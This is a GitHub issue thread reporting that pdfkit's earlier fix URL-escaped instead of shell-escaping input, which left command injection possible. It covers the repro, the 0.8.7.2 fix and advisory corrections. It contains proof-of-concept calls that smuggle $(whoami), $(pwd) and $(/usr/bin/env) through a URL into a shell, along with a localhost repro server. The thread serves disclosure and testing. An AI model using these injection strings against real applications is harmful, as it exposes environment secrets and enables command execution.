### ISSUE TITLE
High Severity: URL Escaping when you should be shell escaping

### ISSUE THREAD

**Issue by kiafaldorius** [pdfkit/pdfkit#517]
The fix in PR #509  ( https://github.com/pdfkit/pdfkit/pull/509 ) does not fix the underlying issue. The issue is you're not shell escaping the input that you're passing to a shell command. The fix in the PR uses a URI escape. You should be using a shell escape, eg single quotes that won't interpolate its contents and/or [Shellwords.join](https://ruby-doc.org/stdlib-2.5.1/libdoc/shellwords/rdoc/Shellwords.html#method-c-shelljoin) . The single quote alone could have saved you a lot of trouble.

If the user doesn't property escape the URI they pass to the command, that's their problem. However, PDFKit is passing that input to a command, so shell escaping is this library's responsibility.

It just so happens that *most* of the time, the special characters in the shell is also a special character in the URL, but not always...For example, see what URL gets hit when you try this on Linux or Mac:

```
PDFKit.new('http://localhost:3000/?home=$HOME").to_pdf
PDFKit.new('http://localhost:3000/?pwd=$(pwd)&user=$(whoami)').to_pdf
PDFKit.new('http://localhost:3000/?env=$(/usr/bin/env)').to_pdf
```

It exposes every environment variable and I can still mostly run any command that doesn't need a space and get their output. There are many candidates in /sbin that would be very fun to try.

The PR broke my usage due to double escaping, hence why I went digging.

```
url = "http://localhost:3000/?user%5Bname%5D=hello"
URI::DEFAULT_PARSER.escape(URI::DEFAULT_PARSER.unescape(url)) == url
# => false
```

The user[name] into `user%5Bname%5D` escaping is perfectly normal in Rails, it happens all the time (eg, with to_query) and is a valid url.

TLDR: The security fix you had didn't fix any security issue and potentially breaks a lot of other people's apps.

Good luck on implementing a proper fix.

**Comment by kiafaldorius** [comment]
@serene Sorry to just pop in and run, but wanted to highlight this before I step out. I may drop a PR sometime next week if I find some time, but I wouldn't count on it if you can get to it earlier.

**Comment by postmodern** [comment]
If anyone is interested in testing this locally, I wrote up some test scripts to repro this:

```ruby
source 'https://rubygems.org/'

# `dnf install wkhtmltopdf` / `apt install wkhtmltopdf`
gem 'pdfkit', '~> 0.8.7'
gem 'webrick'
gem 'sinatra'
```

```ruby
require 'bundler/setup'
require 'pdfkit'
PDFKit.new("http://localhost:3000/?home=$HOME").to_pdf
```

```ruby
require 'bundler/setup'
require 'sinatra/base'

class App < Sinatra::Base

  get '/' do
    puts "Received HOME: #{params['home']}"

    halt 200, "Got your HOME lol"
  end

end

App.run!(host: 'localhost', port: 3000)
```

In terminal 1:

```
$ ruby test.rb
```

In terminal 2:

```
$ ruby app.rb 
[2022-10-08 01:36:48] INFO  WEBrick 1.7.0
[2022-10-08 01:36:48] INFO  ruby 3.1.2 (2022-04-12) [x86_64-linux]
== Sinatra (v3.0.1) has taken the stage on 3000 for development with backup from WEBrick
[2022-10-08 01:36:48] INFO  WEBrick::HTTPServer#start: pid=35616 port=3000
Received HOME: /home/postmodern
::1 - - [08/Oct/2022:01:36:51 PDT] "GET /?home=/home/postmodern HTTP/1.1" 200 17
- -> /?home=/home/postmodern
```

**Comment by MuhammetDilmac** [comment]
I'm trying to fix it in a few hours.

**Comment by postmodern** [comment]
This can finally be closed now that 0.8.7.2 has been released.

**Comment by vladimir-mencl-eresearch** [comment]
Btw, there should perhaps be another security advisory issued against 0.8.7 and 0.8.7.1 (anything < 0.8.7.2) with something like "insufficient" fix for the previous vulnerability.

**Comment by kiafaldorius** [comment]
@vladimir-mencl-eresearch I haven't opened security advisories in years, so don't know the process anymore. The ruby advisory db entry marking 0.8.7 as fixed did get reverted and updated to mark 0.8.7.2: https://github.com/rubysec/ruby-advisory-db/issues/517

**Comment by kiafaldorius** [comment]
Closing off this ticket since the security flaw is fixed. The url escaping is still causing issues, but I already have a workaround.

Thank you everyone! Yay Open Source!

**Comment by vladimir-mencl-eresearch** [comment]
> @vladimir-mencl-eresearch I haven't opened security advisories in years, so don't know the process anymore. The ruby advisory db entry marking 0.8.7 as fixed did get reverted and updated to mark 0.8.7.2: [rubysec/ruby-advisory-db#517](https://github.com/rubysec/ruby-advisory-db/issues/517)

As an easy way forward, you could start by issuing a Security Advisory for pdfkit on GitHub directly.  Under Security => Advisories, there is a New Security Advisory button with a form that we should have all the info for.

Would you like to give it a try - reporting it as a new vuln with fixed version being 0.8.7.2?

Cheers,
Vlad

Hi @kiafaldorius , thanks for the reply.

Glad to hear the entry in rubysec/ruby-advisory-db got updated... but, once the information that a specific vuln is fixed in a specific version is sent out, you can't really reliably retract that statement.  That's why many projects do issue follow-up vuln reports to make it clear that the initial fix wasn't enough.  Otherwise, the information that the interim version is "secure enough" would be circulating around - and would lead deployers to believe they do not need to do final updates because they already have the fixed version.

For example, the tracker for this issue in the GitHub security advisory records it as fixed in 0.8.7: https://github.com/advisories/GHSA-rhwx-hjx2-x4qr

And, this tracker is used for security alerts that GitHub sends to apps hosted on GitHub for their dependencies.

**Comment by kiafaldorius** [comment]
@vladimir-mencl-eresearch Thank you. Sorry it took me so long to get back, I've been busy elsewhere.

I couldn't find a "New Security Advisory" button, but I went to the GHSA link above and suggested an improvement pointed toward the new version: https://github.com/github/advisory-database/pull/795

**Comment by vladimir-mencl-eresearch** [comment]
Hi @kiafaldorius , thanks for that.

Let's see whether they accept PRs changing the fixed-version.

Btw, looking at the PR: are you sure with `"last_known_affected_version_range": "< 0.8.7"` ?  Shouldn't that be `0.8.7.2` ?

Cheers,
Vlad

**Comment by kiafaldorius** [comment]
@vladimir-mencl-eresearch That was filled in automatically for me when I submitted the form. I assume the `last_known_affected_version_range` was there as a record of "This security advisory used to state < 0.8.7 but it was wrong and is now 0.8.7.2".

**Comment by vladimir-mencl-eresearch** [comment]
Thanks!  And I got alerted for a repo where I still use 0.8.7.1 - happy to confirm this part works.  And I'm now off to update to 0.8.7.2 in my repo.

**Comment by kanadgodse-lh** [comment]
I don't know if you know that this is still open!
https://github.com/advisories/GHSA-rhwx-hjx2-x4qr
